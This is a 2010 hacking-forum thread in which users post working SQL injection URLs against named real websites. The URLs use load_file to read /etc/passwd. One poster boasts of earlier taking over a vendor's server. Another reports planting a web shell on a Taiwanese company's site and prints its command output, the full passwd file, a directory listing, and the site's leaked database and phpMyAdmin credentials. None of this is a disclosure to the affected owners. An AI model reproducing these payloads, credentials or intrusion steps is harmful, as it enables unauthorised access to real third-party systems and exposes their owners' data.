Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
eset[dot]hk payment site vulnerable again.
Posted by: VMw4r3
Date: July 29, 2010 07:15PM

http://isrtinkode.wordpress.com/2010/03/21/eset-nod32-hong-kong-hacked/

Tink0de and I took over esets hong kong server through this site, It was on the same server as a payment system I think.
Its vulnerable again... You would thing they would know better.
I haven't seen eset on this server yet, I think they have moved.....

hxxp://www.version-2.com/ipevo/product/details_exp.php?fn=1 and 1=2 union all select 1,2,load_file('/etc/passwd'),4,5,6--

Options: ReplyQuote
Re: eset[dot]hk payment site vulnerable again.
Posted by: hyrax
Date: August 05, 2010 09:27PM

Do you know why /etc/shadow or gshadow doesn't show anything?

Same thing happens with:

hxxp://www.lelon.com.tw/index.php?fn=cat&id=12 and 1=2 UNION ALL SELECT 1,load_file('/etc/passwd')--

/etc/shadow doesn't show anything



Edited 3 time(s). Last edit at 08/05/2010 09:34PM by hyrax.

Options: ReplyQuote
Re: eset[dot]hk payment site vulnerable again.
Posted by: alexfoo
Date: August 06, 2010 01:12AM

/etc/shadow is only readable by root, mysqld is ran by nobody (or similar low-privilege user).

Options: ReplyQuote
Re: eset[dot]hk payment site vulnerable again.
Posted by: hyrax
Date: August 06, 2010 02:38PM

alexfoo Wrote:
-------------------------------------------------------
> /etc/shadow is only readable by root, mysqld is
> ran by nobody (or similar low-privilege user).


Thanks.

Options: ReplyQuote
Re: eset[dot]hk payment site vulnerable again.
Posted by: VMw4r3
Date: August 10, 2010 04:52PM

@hyrax
your demo@localhost but you have privilages to write in the images directory and take over the server.

hxxxp://www.lelon.com.tw/images/small.php?cmd=uname -a

Linux localhost.localdomain 2.6.15-1.2054_FC5smp #1 SMP Tue Mar 14 16:05:46 EST 2006 i686 i686 i386 GNU/Linux


hxxxp://www.lelon.com.tw/images/small.php?cmd=cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
beagleindex:x:58:58:User for Beagle indexing:/var/cache/beagle:/bin/false
distcache:x:94:94:Distcache:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sal001:x:500:500::/home/sal001:/bin/bash
mis003:x:501:501:mis003:/home/mis003:/bin/bash
ftpuser:x:503:503::/home/ftpuser:/bin/bash

Options: ReplyQuote
Re: eset[dot]hk payment site vulnerable again.
Posted by: VMw4r3
Date: August 10, 2010 05:03PM

Plain text:

hxxp://www.lelon.com.tw/lib/config.inc

<?
// &#36039;&#26009;&#24235;&#35373;&#23450;
$DBHOST = 'localhost';
$DBUSER = 'demo';
$DBPASS = 'demo';
$DBNAME = 'lelon'

http://www.lelon.com.tw/phpMyAdmin/

.htaccess user/pass
demo/demo

I'm gonna delete the shell now,
total 3736
drwxr-xrwx 4 mis003 mis003 4096 Aug 11 05:20 .
drwxrwxrwx 20 mis003 mis003 4096 Aug 9 14:46 ..
-rw-rw-rw- 1 mysql mysql 69 Aug 11 04:56 123.txt
-rwxr-xrwx 1 1000 users 215552 Apr 26 2007 Thumbs.db
-rw-r--r-- 1 ftpuser ftpuser 295256 Apr 26 2007 WS_FTP.LOG
-rwxr-xrwx 1 1000 users 55677 Apr 26 2007 about.swf
drwxr-xrwx 2 1000 users 4096 Jun 11 2008 admin
-rwxr-xrwx 1 1000 users 69 Apr 26 2007 arrow_first.gif
-rwxr-xrwx 1 1000 users 69 Apr 26 2007 arrow_last.gif
-rwxr-xrwx 1 1000 users 76 Apr 26 2007 arrows.gif
-rwxr-xrwx 1 1000 users 180 Apr 26 2007 back.gif
-rwxr-xrwx 1 1000 users 2365 Apr 26 2007 bg_14001_r1_c1.gif
-rw-r--r-- 1 ftpuser ftpuser 1884 Apr 26 2007 bg_16949_r1_c1.gif
-rwxr-xrwx 1 1000 users 2389 Apr 26 2007 bg_9000_r1_c1.gif
-rwxr-xrwx 1 1000 users 696 Apr 26 2007 bg_9000_r2_c1.gif
-rwxr-xrwx 1 1000 users 1796 Apr 26 2007 bg_9000_r3_c1.gif
-rwxr-xrwx 1 1000 users 2353 Apr 26 2007 bg_9001_r1_c1.gif
-rwxr-xrwx 1 1000 users 929 Apr 26 2007 bg_p_r1_c1.jpg
-rwxr-xrwx 1 1000 users 1714 Apr 26 2007 bg_p_r1_c2.jpg
-rwxr-xrwx 1 1000 users 1008 Apr 26 2007 bg_p_r1_c3.jpg
-rwxr-xrwx 1 1000 users 1781 Apr 26 2007 bg_p_r2_c2.jpg
-rwxr-xrwx 1 1000 users 3794 Apr 26 2007 bg_search.gif
-rwxr-xrwx 1 1000 users 1904 Apr 26 2007 bg_search_g.gif
-rwxr-xrwx 1 1000 users 596 Apr 26 2007 bg_t.gif
-rwxr-xrwx 1 1000 users 146 Apr 26 2007 botton_bro.gif
-rwxr-xrwx 1 1000 users 908 Apr 26 2007 botton_resume.gif
-rwxr-xrwx 1 1000 users 906 Apr 26 2007 botton_search.gif
-rwxr-xrwx 1 1000 users 220 Apr 26 2007 botton_yes.gif
-rwxr-xrwx 1 1000 users 22967 Apr 26 2007 contact.swf
-rwxr-xrwx 1 1000 users 1290 Apr 26 2007 distributor.gif
-rwxr-xrwx 1 1000 users 328 Apr 26 2007 div_1.jpg
-rwxr-xrwx 1 1000 users 45 Apr 26 2007 dot.gif
-rwxr-xrwx 1 1000 users 54 Apr 26 2007 dot05.gif
-rwxr-xrwx 1 1000 users 8284 Apr 26 2007 ecap.gif
-rwxr-xrwx 1 1000 users 6222 Apr 26 2007 ecap_link.gif
-rwxr-xrwx 1 1000 users 1953 Apr 26 2007 get_adobe_reader.gif
-rwxr-xrwx 1 1000 users 18570 Apr 26 2007 hr.swf
-rwxr-xrwx 1 1000 users 33298 Apr 26 2007 icon.psd
-rwxr-xrwx 1 1000 users 185 Apr 26 2007 icon_01.gif
-rwxr-xrwx 1 1000 users 330 Apr 26 2007 icon_07.gif
-rwxr-xrwx 1 1000 users 1010 Apr 26 2007 icon_close.gif
-rwxr-xrwx 1 1000 users 587 Apr 26 2007 icon_con.gif
-rwxr-xrwx 1 1000 users 1733 Apr 26 2007 icon_d.jpg
-rwxr-xrwx 1 1000 users 397 Apr 26 2007 icon_env.gif
-rwxr-xrwx 1 1000 users 1969 Apr 26 2007 icon_pdf.jpg
-rwxr-xrwx 1 1000 users 672 Apr 26 2007 icon_sear.gif
-rwxr-xrwx 1 1000 users 1188 Apr 26 2007 img01.gif
-rwxr-xrwx 1 1000 users 1188 Apr 26 2007 img02.gif
-rwxr-xrwx 1 1000 users 46678 Apr 26 2007 img_about.jpg
-rwxr-xrwx 1 1000 users 24128 Apr 26 2007 img_app_r1_c1.jpg
-rwxr-xrwx 1 1000 users 21775 Apr 26 2007 img_app_r1_c2.jpg
-rwxr-xrwx 1 1000 users 32511 Apr 26 2007 img_app_r2_c1.jpg
-rwxr-xrwx 1 1000 users 35353 Apr 26 2007 img_app_r2_c2.jpg
-rwxr-xrwx 1 1000 users 27452 Apr 26 2007 img_app_r3_c1.jpg
-rwxr-xrwx 1 1000 users 31872 Apr 26 2007 img_app_r3_c2.jpg
-rwxr-xrwx 1 1000 users 2679 Apr 26 2007 img_app_r4_c1.jpg
-rwxr-xrwx 1 1000 users 7882 Apr 26 2007 img_app_r4_c2.jpg
-rwxr-xrwx 1 1000 users 21124 Apr 26 2007 img_contact.jpg
-rwxr-xrwx 1 1000 users 37587 Apr 26 2007 img_ecap_r1_c1.gif
-rwxr-xrwx 1 1000 users 25887 Apr 26 2007 img_ecap_r1_c2.gif
-rwxr-xrwx 1 1000 users 61679 Apr 26 2007 img_hr.jpg
-rwxr-xrwx 1 1000 users 12514 Apr 26 2007 img_index.jpg
-rwxr-xrwx 1 1000 users 74956 Apr 26 2007 img_news.jpg
-rwxr-xrwx 1 1000 users 2856 Apr 26 2007 img_p01.jpg
-rwxr-xrwx 1 1000 users 2938 Apr 26 2007 img_p02.jpg
-rwxr-xrwx 1 1000 users 17512 Apr 26 2007 img_product.jpg
-rwxr-xrwx 1 1000 users 30348 Apr 26 2007 iso14001.jpg
-rwxr-xrwx 1 1000 users 23769 Apr 26 2007 iso9001.jpg
-rwxr-xrwx 1 1000 users 38013 Apr 26 2007 know_how.jpg
-rwxr-xrwx 1 1000 users 182 Apr 26 2007 line.gif
-rwxr-xrwx 1 1000 users 4159 Apr 26 2007 logo.gif
-rwxr-xrwx 1 1000 users 68905 Apr 26 2007 logo.psd
-rwxr-xrwx 1 1000 users 174677 Apr 26 2007 main.swf
-rwxr-xrwx 1 1000 users 39306 Apr 26 2007 map.jpg
-rwxr-xrwx 1 1000 users 22244 Apr 26 2007 news.swf
-rwxr-xrwx 1 1000 users 3407 Apr 26 2007 oc_con.jpg
-rwxr-xrwx 1 1000 users 4714 Apr 26 2007 peoples_2.jpg
-rwxr-xrwx 1 1000 users 8193 Apr 26 2007 peoples_3.jpg
-rwxr-xrwx 1 1000 users 7301 Apr 26 2007 peoples_6.jpg
-rwxr-xrwx 1 1000 users 4245 Apr 26 2007 peoples_7.jpg
drwxr-xrwx 2 1000 users 4096 Apr 26 2007 photo
-rwxr-xrwx 1 1000 users 1993 Apr 26 2007 pic_1.jpg
-rwxr-xrwx 1 1000 users 7600 Apr 26 2007 pic_p01.jpg
-rwxr-xrwx 1 1000 users 304 Apr 26 2007 pix_1.jpg
-rwxr-xrwx 1 1000 users 587 Apr 26 2007 point_1.jpg
-rwxr-xrwx 1 1000 users 468 Apr 26 2007 point_2.jpg
-rwxr-xrwx 1 1000 users 8544 Apr 26 2007 process.gif
-rwxr-xrwx 1 1000 users 13578 Apr 26 2007 process02.gif
-rwxr-xrwx 1 1000 users 669530 Apr 26 2007 process03.gif
-rwxr-xrwx 1 1000 users 35880 Apr 26 2007 products.swf
-rwxr-xrwx 1 1000 users 23476 Apr 26 2007 qs9000.jpg
-rw-rw-rw- 1 mysql mysql 150 Aug 11 05:01 ram.php
-rw-r--r-- 1 apache apache 99663 Aug 11 05:02 ram0.php
-rw-r--r-- 1 apache apache 99663 Aug 11 05:19 ram0.phtml
-rwxr-xrwx 1 1000 users 349 Apr 26 2007 rep_1.jpg
-rwxr-xrwx 1 1000 users 354 Apr 26 2007 rep_2.jpg
-rwxr-xrwx 1 1000 users 351 Apr 26 2007 rep_line.jpg
-rwxr-xrwx 1 1000 users 25475 Apr 26 2007 sbanner.swf
-rw-r--r-- 1 apache apache 36 Aug 11 05:20 small.php
-rw-rw-rw- 1 mysql mysql 36 Aug 11 05:03 small12345.php
-rwxr-xrwx 1 1000 users 43 Apr 26 2007 spacer.gif
-rwxr-xrwx 1 1000 users 432 Apr 26 2007 submit.jpg
-rwxr-xrwx 1 1000 users 4392 Apr 26 2007 tdimg_01.gif
-rwxr-xrwx 1 1000 users 2496 Apr 26 2007 tdimg_02.gif
-rwxr-xrwx 1 1000 users 42095 Apr 26 2007 tdimg_03.gif
-rwxr-xrwx 1 1000 users 2068 Apr 26 2007 tdimg_04.gif
-rwxr-xrwx 1 1000 users 725 Apr 26 2007 tdimg_05.gif
-rwxr-xrwx 1 1000 users 5351 Apr 26 2007 tdimg_06.gif
-rwxr-xrwx 1 1000 users 999 Apr 26 2007 tdimg_07.gif
-rwxr-xrwx 1 1000 users 69834 Apr 26 2007 text.psd
-rwxr-xrwx 1 1000 users 3250 Apr 26 2007 text_1.gif
-rwxr-xrwx 1 1000 users 465 Apr 26 2007 text_1.jpg
-rwxr-xrwx 1 1000 users 121 Apr 26 2007 text_2.gif
-rwxr-xrwx 1 1000 users 57384 Apr 26 2007 title.psd
-rwxr-xrwx 1 1000 users 651 Apr 26 2007 title01.gif
-rwxr-xrwx 1 1000 users 815 Apr 26 2007 title02.gif
-rwxr-xrwx 1 1000 users 810 Apr 26 2007 title03.gif
-rwxr-xrwx 1 1000 users 663 Apr 26 2007 title03_2.gif
-rwxr-xrwx 1 1000 users 624 Apr 26 2007 title03_2_s.gif
-rwxr-xrwx 1 1000 users 744 Apr 26 2007 title04.gif
-rwxr-xrwx 1 1000 users 651 Apr 26 2007 title05.gif
-rwxr-xrwx 1 1000 users 654 Apr 26 2007 title06.gif
-rwxr-xrwx 1 1000 users 748 Apr 26 2007 title07.gif
-rwxr-xrwx 1 1000 users 756 Apr 26 2007 title_contact.gif
-rwxr-xrwx 1 1000 users 589 Apr 26 2007 title_p.gif
-rwxr-xrwx 1 1000 users 610 Apr 26 2007 title_p02.gif
-rwxr-xrwx 1 1000 users 577 Apr 26 2007 title_p03.gif
-rwxr-xrwx 1 1000 users 756 Apr 26 2007 title_p04.gif
-rwxr-xrwx 1 1000 users 570 Apr 26 2007 title_p05.gif
-rwxr-xrwx 1 1000 users 691 Apr 26 2007 title_p06.gif
-rwxr-xrwx 1 1000 users 591 Apr 26 2007 title_s.gif
-rwxr-xrwx 1 1000 users 647 Apr 26 2007 title_search.gif
-rwxr-xrwx 1 1000 users 43 Apr 26 2007 tr1.gif
-rwxr-xrwx 1 1000 users 43 Apr 26 2007 tr2.gif
-rw-r--r-- 1 ftpuser ftpuser 15955 Apr 26 2007 ts16949.jpg
-rwxr-xrwx 1 1000 users 3214 Apr 26 2007 txt_distributor.gif
-rwxr-xrwx 1 1000 users 186 Apr 26 2007 up.gif



Edited 1 time(s). Last edit at 08/10/2010 11:21PM by VMw4r3.

Options: ReplyQuote


Sorry, only registered users may post in this forum.